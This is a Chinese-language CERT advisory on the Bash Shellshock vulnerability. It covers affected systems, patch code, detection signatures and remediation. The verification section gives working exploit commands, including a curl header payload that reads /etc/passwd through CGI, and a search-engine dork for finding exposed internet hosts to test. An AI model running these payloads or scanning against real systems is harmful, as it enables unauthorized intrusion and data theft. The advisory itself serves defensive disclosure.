“破壳”漏洞(CVE )综合分析_V1.53

Size: px

Start display at page:

Download "“破壳”漏洞(CVE )综合分析_V1.53"

大戴
4 years ago
Views:

1 安天实验室安全研究与应急处理中心 ( 安天 CERT) 破壳漏洞系列分析之一首次发布时间 :2014 年 9 月 25 日 10 时本版本更新时间 :2014 年 10 月 13 日 11 时 20 分

3 1 威胁卡片漏洞英文名称中文命名威胁响应等级漏洞相关 CVE 编号 Bash Shellshock 破壳 (X-CERT) A 级 CVE 漏洞发现者 StéphaneChazelas( 法国 ) 漏洞发现事件漏洞公布时间漏洞影响对象 2014 年 9 月中旬 9 月 25 日 Linux/Unix 系统 2 概述 2014 年 9 月 24 日 Bash 被公布存在远程代码执行漏洞, 安天实验室安全研究与应急处理中心 ( 以下简称 : 安天 CERT) 第一时间根据信息研判, 确认该漏洞可以产生严重的后果, 且分布广泛, 于北京时间 9 月 24 日早晨 5 时 30 分启动了 A 级风险应急响应安天 CERT 针对该漏洞进行了严格地分析验证, 确认该漏洞会影响目前主流的 Linux 和 Mac OSX 操作系统平台, 包括但不限于 Redhat CentOS Ubuntu Debian Fedora Amazon Linux OS X 等平台该漏洞可以通过构造环境变量的值来执行想要执行的攻击代码脚本, 会影响到与 Bash 交互的多种应用, 包括 HTTP OpenSSH DHCP 等根据目前的漏洞验证情况以及已经流传的 POC 情况, 这个漏洞将严重影响网络基础设施的安全, 包括但不限于网络设备网络安全设备云和大数据中心等特别是 Bash 广泛地分布和存在于设备中, 其消除过程将非常长尾, 且易于利用其编写蠕虫进行自动化传播, 同时也将导致僵尸网络的发展, 目前已有多个境外安全机构发出了警告注 1:Bash 引自维基百科的描述为 :"Bash,Unix shell 的一种 1989 年发布第一个正式版本, 原先是计划用在 GNU 操作系统上, 但能运行于大多数类 Unix 系统的操作系统之上, 包括 Linux 与 Mac OS X v10.4 都将它作为默认 shell 它也被移植到 Microsoft Windows 上的 Cygwin 与 MinGW, 或是可以在 MS-DOS 上使用的 DJGPP 项目在 Novell NetWare 与 Android 上也有移植 " 注 2:A 级响应是安天对威胁认定的最高等级, 安天针对可能引发大规模网络瘫痪阻塞的蠕虫疫情和严重漏洞, 以及可能大面积危害关键信息系统和基础设施安全的严重威胁将启动 A 级响应具体响应要求为, 无条件中止分析团队现有工作, 立即成立分析小组, 启动快速分析工作, 及时通报相关 CERT 组织和管理部门 ; 对威胁进行持续跟踪, 对分析和响应相关文献, 持续更新同步等这是安天今年第二次启动 A 级响应, 此前一次为心脏出血漏洞, 自安天建立威胁响应分级机制以来, 曾为安天实验室版权所有, 欢迎无损转载第 2 页

4 口令蠕虫震荡波冲击波 SQL Slammer 魔波熊猫烧香等事件启动 A 级响应 3 已知事件发布 / 披露情况根据信息检索, 本漏洞发现者为法国 GNU/LINUX 研究者 StéphaneChazelas, 发现时间为 2014 年 9 月中旬, 而披露时间为 2014 年 9 月 24 日表 3-1 漏洞发布厂商列表发布厂商时间链接 NVD :48:04 PM rch_type=all&cves=on Securityfocus :00AM exploit-db 表 3-2 部分主要漏洞影响平台及版本操作系统版本解决方案 Red Hat Enterprise Linux 4 (ELS) Red Hat Enterprise Linux 4 Extended Lifecycle Support - bash el4.2 5 Red Hat Enterprise Linux 5 - bash el5.1 Red Hat Enterprise Linux 5.6 Long Life - bash el5_6.1 Red Hat Enterprise Linux 5.9 Extended Update Support - bash el5_9.2 6 Red Hat Enterprise Linux 6 - bash el6_5.1 Red Hat Enterprise Linux 6.2 Advanced Update Support - bash el6_2.1 Red Hat Enterprise Linux 6.4 Extended Update Support - bash el6_4.1 7 Red Hat Enterprise Linux 7 - bash el7_0.2 CentOS 5 bash el5.1 6 bash el6_5.1 7 bash el7_0.2 Ubuntu bash 4.1-2ubuntu bash 4.2-2ubuntu bash 4.3-7ubuntu1.1 Fedora 19 bash fc19 安天实验室版权所有, 欢迎无损转载第 3 页

5 20 bash fc20 21 bash fc21 Debian deb6u1 4.2+dfsg dfsg-0.1+deb7u Amazon Linux AMI bash Mac OS X 注 3: 也可到进行下载 4 漏洞的影响范围安天 CERT 目前已验证在 Red Hat CentOS Ubuntu Fedora Amazon Linux OS X 中均拥有存在 CVE 漏洞的 Bash 版本, 同时由于 Bash 在各主流操作系统的广泛应用, 此漏洞的影响范围包括但不限于大多数应用 Bash 的 Unix Linux Mac OS X, 而针对这些操作系统管理下的数据均存在高危威胁漏洞的利用方式会通过与 Bash 交互的多种应用展开, 包括 HTTP OpenSSH DHCP 等安天 CERT 目前抽样验证当前出厂预装的 Android 操作系统暂不支持 ENV 命令, 可推测针对 Android 操作系统受到此漏洞影响的可能性较小 5 漏洞原理目前的 Bash 使用的环境变量是通过函数名称来调用的, 导致漏洞出问题是以 (){ 开头定义的环境变量在命令 ENV 中解析成函数后,Bash 执行并未退出, 而是继续解析并执行 shell 命令而其核心的原因在于在输入的过滤中没有严格限制边界, 也没有做出合法化的参数判断在补丁中主要进行了参数的合法性过滤, 补丁程序在 /builtins/evalstring.c 的 parse_and_execute 函数中进行了输入的 command 进行了合法性的边界检测, 将代码注入的可能性排除在排除中主要用到了 flags 的两次判断和 command 的一次类型匹配, 为了能够 flags 判断准确, 在补丁中预先定义了 SEVAL_FUNCDEF SEVAL_ONECMD 两个标识作为判断依据此漏洞进行的补丁更新有三处, 主要进行输入的 command 进行过滤作用 /builtins/common.h #define SEVAL_FUNCDEF 0x080 /* only allow function definitions */ #define SEVAL_ONECMD 0x100 /* only allow a single command */ /builtins/evalstring.c 安天实验室版权所有, 欢迎无损转载第 4 页

$= cm_function_def) { internal_warning ("%s: ignoring function definition attempt", from_file); should_jump_to_top_level = 0; last_result = last_command_exit_value = EX_BADUSAGE;$ break; } /builtins/evalstring.

6 if ((flags & SEVAL_FUNCDEF) && command->type!= cm_function_def) { internal_warning ("%s: ignoring function definition attempt", from_file); should_jump_to_top_level = 0; last_result = last_command_exit_value = EX_BADUSAGE; break; } /builtins/evalstring.c if (flags & SEVAL_ONECMD) break; 从以上阐述的漏洞原理可知, 漏洞的根本原因存在于 Bash 的 ENV 命令实现上, 因此漏洞本身是不能够直接导致远程代码执行的如果要达到远程代码执行的目的, 必须借助第三方服务程序作为媒介才能够实现, 第三方服务程序也必须要满足众多条件才可以充当此媒介的角色例如, 安天 CERT 已验证第三方服务程序 apache2 便可充当此媒介, 其 CGI 组件满足远程访问并调用 Bash 的 ENV 命令进行访问数据解析功能具体如何实现, 参见图 5-1:CVE 漏洞实现远程代码执行原理图图 5-1CVE 漏洞实现远程代码执行原理图 6 漏洞验证方法目前的 Bash 脚本是以通过导出环境变量的方式支持自定义函数, 也可将自定义的 Bash 函数传递给子相关进程一般函数体内的代码不会被执行, 但此漏洞会错误的将 {} 花括号外的命令进行执行安天安天实验室版权所有, 欢迎无损转载第 5 页

CERT 针对破壳漏洞进行了细致的验证, 包括本地验证远程模拟验证远程真实验证远程验证以提供开启 CGI 的 httpd 服务器进行测试因为当执行 CGI 时会调用 Bash 将 Referer host UserAgent header 等作为环境变量进行处理除此之外安天 CERT 还进行了 DHCP 等利用破壳

1 本地验证方法在 shell 中执行下面命令 : env x='() { :;}; echo Vulnerable CVE-2014-6271 ' bash -c "echo test" 执行命令后, 如果显示 VulnerableCVE-2014-6271, 证明系统存在漏洞, 可改变 echo

7 CERT 针对破壳漏洞进行了细致的验证, 包括本地验证远程模拟验证远程真实验证远程验证以提供开启 CGI 的 httpd 服务器进行测试因为当执行 CGI 时会调用 Bash 将 Referer host UserAgent header 等作为环境变量进行处理除此之外安天 CERT 还进行了 DHCP 等利用破壳漏洞攻击的模拟与攻击方法验证 6.1 本地验证方法在 shell 中执行下面命令 : env x='() { :;}; echo Vulnerable CVE ' bash -c "echo test" 执行命令后, 如果显示 VulnerableCVE , 证明系统存在漏洞, 可改变 echo VulnerableCVE 为任意命令进行执行 a. Linux Debian 操作系统漏洞验证如下 : b. 苹果操作系统 (OS X 10.10) 漏洞验证如下 : 6.2 远程验证方法 a. 模拟验证方法 : 此方法适合进行原理验证 1) Ubuntu 下安装及配置 apache 服务器安装 apache2 服务器 #sudo apt-get install apache2 配置 apache2 服务器配置文件位于 /etc/apache2/sites-enabled/000-default 用 vi 打开配置文件 : #sudovi /etc/apache2/sites-enabled/000-default 安天实验室版权所有, 欢迎无损转载第 6 页

8 修改其中两句为 : DocumentRoot /var/www/html ScriptAlias /cgi-bin/ /var/www/html/cgi-bin/ 2) 编写 WEB 服务端测试文件编辑服务端测试文件 #sudovi /var/www/html/cgi-bin/test.sh #!/bin/bash echo "Content-type: text/html" echo "" 然后重启服务 #sudo/etc/init.d/apache2 restart 3) 远程测试测试命令如下 : curl -H 'x: () { :;};a=`/bin/cat /etc/passwd`;echo $a' ' 地址 /cgi-bin/test.sh' -I 命令中可改变 a=`/bin/cat /etc/passwd`;echo $a 为任意命令进行执行 b. 真实验证方法 : 此方法适合互联网管理部门进行互联网普查等 1) 以搜索引擎进行可能存在漏洞的网站检索, 下面以 google 检索为例 : 检索 :inurl:/cgi-bin/ filetype:sh 2) 将检索到的 url 进行提取, 然后替换下面的替换 URL curl -H 'x: () { :;};a=`/bin/cat /etc/passwd`;echo $a' ' 替换 URL' -I 如存在漏洞, 便可复现模拟验证方法的结果, 借此判断漏洞的范围及危害程度等 ; 如不用搜索引擎, 安天实验室版权所有, 欢迎无损转载第 7 页

9 也可以进行构造路径的方式 ( 例如 :IP/cgi-bin/update.sh IP/cgi-bin/admin.sh 等 ), 进行连接尝试, 但这种方法会耗费大量的资源进行无用连接尝试 7 漏洞检测方法您可以应用本地与远程的漏洞验证方法进行脚本程序或 snort 规则等的编写与配置, 进而进行批量的操作系统平台的检测当进行 HTTP 检测时, 可以进行 Referer host UserAgent header 等的头信息字符串 () { 或对应十六进制 \x28\x29\x20\x7b 检测目前已经出现的部分攻击我们还在进一步进行攻击的捕获和特征的提取注 4: 此前版本中的检测规则有问题, 指正后完善, 参见鸣谢 8 漏洞可能会带来的影响此漏洞可以绕过 ForceCommand 在 sshd 中的配置, 从而执行任意命令 ; 如果 CGI 脚本用 Bash 编写, 则使用 mod_cgi 或 mod_cgid 的 Apache 服务器会受到影响 ; DHCP 客户端调用 shell 脚本来配置系统, 可能存在允许任意命令执行 ; 各种 daemon 和 SUID/privileged 的程序都可能执行 shell 脚本, 通过用户设置或影响环境变量值, 允许任意命令运行 9 针对此漏洞的建议按第六节中的漏洞验证方法进行验证判定, 如确定存在漏洞, 则针对第三节给出的解决方案进行版本更新更新 Bash 源码, 针对 ENV 命令实现部分, 进行边界检查与参数过滤, 严格界定函数定义范围, 并做合法化的参数判断 10 写在最后的啰嗦的话这是安天 CERT 今年内第二次做出 A 级响应, 而此前一次是 Heart Bleed( 心脏出血 ) 当我们回望安天 A 级响应的档案, 我们看到了很多熟悉的名字 : 口令蠕虫震荡波冲击波而在心脏出血出现之前的几年时间内, 正是威胁高度定向化发展的时代, 安天 CERT 的工作重心安天实验室版权所有, 欢迎无损转载第 8 页

10 转向去分析更为精致漫长的 APT 攻击, 已经有多年未启动过 A 级响应所以当心脏出血到来的时候, 我们显得那样慌乱我们已经不习惯被凌晨从睡梦中叫醒, 我们突然发现基础环境需要重新搭建当时我们的感觉是, 如同一群在犯罪现场小心取证捉摸研究的侦探, 突然发现全城大火, 任务迅速变成全体去参与救火而对安全分析工程师来说, 只要重入火线, 就可以唤醒沉睡的敏锐和血性安全永不止步, 因为威胁永不止步安天的分析团队负责人李柏松在访问 McAfee 时, 曾被 Safe Never Sleep 的标语所感动, 但他说, 更令人感动的是深夜从 Avtar 酒店楼下, 看到 McAfee 不熄的灯火对于破壳漏洞, 我们的工作依然显得粗浅, 但相对于心脏出血中的慌乱, 明显我们已经重新变得从容特别是当我们再次被凌晨唤醒时, 我们已经由咬牙从睡梦中爬起, 变成条件反射式的起身安全的难以卡位, 亦因为威胁的不可预期自 2004 年,DEP ALSR 等技术陆续引入主流系统后, 基于远程一击必杀的威胁开始明显减少, 而那些未公开出来的 0day 预计也被作为秘密武器谨慎使用大规模蠕虫开始减少, 不再有更多的恶意代码名称为公众所知, 这给了公众一种安全的错觉, 也带来了安全愿景的虚妄对于笃定可信 + 主防就可以打造安全永动机的人们来说, 往往都忘记了脚本这个令安全管理者爱恨交织的存在安全难以完美, 更因为时间并不站在防御者这一边无论是攻击包一击必杀的闪电战, 还是威胁的长期潜伏, 都是如此 HeartBleed 漏洞在代码中潜伏了 3 年之久, 而破壳漏洞则可能已经存在了 10 年在这个潜伏期内, 其是幸运的在始终沉睡, 还是早已成为入室利器, 尚不得而知相关漏洞是开发者的无心之失, 还是一次精心设计的代码污染, 目前都难以推测了可以想象的是, 一切无法完整复盘的信息安全灾难, 都注定会成为阴谋论的脚本安全进步缓慢, 也在于人们有太多的想当然心脏出血与破壳的漏洞都来自开源系统而太多善良的人们自然的认定, 开源的安全由无数代码维护者审计者和用户保证而无论是心脏出血的 Open SSL, 还是破壳的 Bash, 尽管或者在很多开发者编译者的系统中如白驹过隙般的编译通过, 但相关漏洞均如白驹过隙, 一闪而过而对于攻击者来说, 相关代码却可能得到了长时间的研究与挖掘泛泛的比较开源与闭源孰更安全是没有意义的, 我们只想再次强调, 开源并不必然导致安全安全难以改善, 更在于威胁不断泛化和继承, 从 PC 时代移动时代穿戴设备和智能家居时代, 易用性方便性一直在飞速的发展和进步, 新设备也开始拥有更高的主频, 拥有更为复杂的操作系统但既有的安全的经验与方法并未得到有效地传递和继承而代码复用等则把类似心脏出血和破壳这样的漏洞引入更多的领域纵深, 从而带来了更复杂困难的处置长尾而未来更多异构设备间功能协同交叉访问数据共享, 则使安全的形势更加复杂处置更加困难问题更难定性当威胁纷至沓来的时候, 我们因应接不暇而心力交瘁的时候, 作为一个职业安全工作者, 我们则需要安天实验室版权所有, 欢迎无损转载第 9 页

11 提醒自己, 不要迷失对安全的信心与信念, 但也不要丧失对信息技术发展的期待安全不是信息技术的全部, 我们需要生活在一个快速发展便利快乐的世界, 并为之提供保障附录一 : 鸣谢在针对破壳漏洞的整体分析中, 安天 CERT 获得了大量的支持与帮助 : 感谢 Lenxwei 第一时间在微信的信息分享, 让我们于凌晨启动了分析响应 ; 感谢 CNCERT/CC 的指导与反馈 ; 针对网络检测方法给予的指正 ; 感谢兄弟厂商知道创宇 360 等的无私互动 ; 感谢 XCERT 成员杜跃进黄晟余弦大潘赵粮等的支持附录二 : 关于破壳漏洞命名经过本漏洞被命名为破壳源自国内一个基于 SNS 的松散型 CERT 组织 X-CERT 的一次在线讨论根据 X-CERT 关于破壳漏洞的说明整理 : 本漏洞中文名称在 9 月 25 日下午经 X-CERT 讨论命名具体过程如下, 鉴于该漏洞可能带来的严重影响, 为了便于加深公众理解, 便于媒体传播,X-CERT 发起人之一杜跃进博士提出, 应为此漏洞起一个中文名字基于这一漏洞针对操作系统的 shell( 壳 ) 进行利用基于 Bash 的音译 + 意译组合,X-CERT 成员黄晟 ( 中油瑞飞 ) 提出了扒壳的命名, 获得大家称赞, 但黄晟自己认为不够信达雅, 建议继续讨论在讨论中 X-CERT 成员肖新光 ( 安天 ) 提出了破壳的命名,X-CERT 其他成员包括余弦 ( 知道创宇 ) 赵粮 ( 绿盟 ) 潘柱廷( 启明星辰 ) 谭晓生(360) 王琦(KEEN) 等表示一致支持遂正式将该漏洞中文名称确定为破壳附录三 : 国内兄弟安全团队分析成果参考 [1] 知道创宇 : Bash 命令执行漏洞分析 [2] 知道创宇 : 破壳漏洞(ShellShock) 应急概要安天实验室版权所有, 欢迎无损转载第 10 页

12 附录四 : 其他参考链接 [1] 维基百科 :Bash [2] Resolution for Bash Code Injection Vulnerability via Specially Crafted Environment Variables (CVE , CVE ) in Red Hat Enterprise Linux [3] [CentOS] Critical update for bash released today By Jim Perrin jperrin [4] CVE in Ubuntu (Canonical Ltd.) [5] oss-sec mailing list archives [6] Bash specially-crafted environment variables code injection attack k/ [7] Bash bug as big as HeartbleedBy Robert Graham [8] CVE (Debian) 附录五 : 关于安天安天是专业的下一代安全检测引擎研发企业, 安天的检测引擎为网络安全产品和移动设备提供病毒和各种恶意代码的检测能力, 并被超过十家以上的著名安全厂商所采用, 全球有数万台防火墙和数千万部手机的安全软件内置有安天的引擎安天获得了 2013 年度 AV-TEST 年度移动设备最佳保护奖依托引擎沙箱和后台体系的能力, 安天进一步为行业企业提供有自身特色的基于流量的反 APT 解决方案关于反病毒引擎更多信息请访问 : 中文 ) 安天实验室版权所有, 欢迎无损转载第 11 页

13 英文 ) 关于安天反 APT 相关产品更多信息请访问 : 附录六 : 文档更新日志更新日期更新版本更新内容 :00 V1.0 预警版本, 进行漏洞中文命名简要原理说明影响平台与范围快速解决方案, 及给用户的建议等 :50 V1.1 增加漏洞的本地验证漏洞带来的影响更新影响平台及解决方案等 :40 V1.2 增加远程漏洞验证利用漏洞进行远程代码执行原理分析漏洞检测方法等 :30 V1.3 增加漏洞远程普查方式漏洞的补丁代码分析 :50 V1.4 增加总结修改检测部分 :30 V1.5 修改总结修改文档整体结构增加 PDF 版本 :46 V1.51 修订检测方式, 增加鸣谢, 改正错别字 :20 V1.52 修订鸣谢, 增加国内兄弟安全团队分析成果参考, 增加关于安天 :20 V1.53 更换模板安天实验室版权所有, 欢迎无损转载第 12 页

“破壳”漏洞(CVE )综合分析[V1.52]

“破壳”漏洞(CVE )综合分析[V1.52] 破壳漏洞 (CVE-2014-6271) 综合分析 _V1.52 安天实验室安全研究与应急处理中心 ( 安天 CERT) 首次发布时间 :2014 年 9 月 25 日 10 时本版本更新时间 :2014 年 9 月 29 日 13 时 20 分目录一威胁卡片... 2 二概述... 2 三已知事件发布 / 披露情况... 3 四漏洞的影响范围... 4 五漏洞原理... 4 六